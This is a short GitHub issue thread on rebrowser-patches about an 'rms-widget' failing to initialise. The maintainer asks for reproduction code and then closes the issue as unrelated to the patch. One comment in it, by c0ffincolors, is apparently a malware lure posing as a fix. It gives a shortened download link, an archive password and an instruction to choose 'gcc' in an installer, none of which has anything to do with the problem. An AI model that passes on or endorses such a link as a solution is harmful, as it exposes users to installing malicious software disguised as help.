### ISSUE TITLE
RMS Widget

### ISSUE THREAD

**Issue by RealMrHex** [rebrowser/rebrowser-patches#11]
is looks like this patch prevent sites to create RMS Session ID.

console errors:
Error: Uncaught (in promise): Error: unable to initialize rms-widget
Error: unable to initialize rms-widget

is there any way to fix it?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by nwebson** [comment]
Not sure what is RMS. Could you please share example of your code so I can reproduce it?

**Comment by RealMrHex** [comment]
Sure @nwebson, ill send it to you today.
Before anything, thank you very much for your awesome work and your time ❤️🙏

**Comment by RealMrHex** [comment]
@nwebson 
check this please, thanks in advance.
https://github.com/RealMrHex/browser/issues/1

**Comment by nwebson** [comment]
It's not about the patch, so I'm closing this issue. I will do my best to try to help you in your repo.
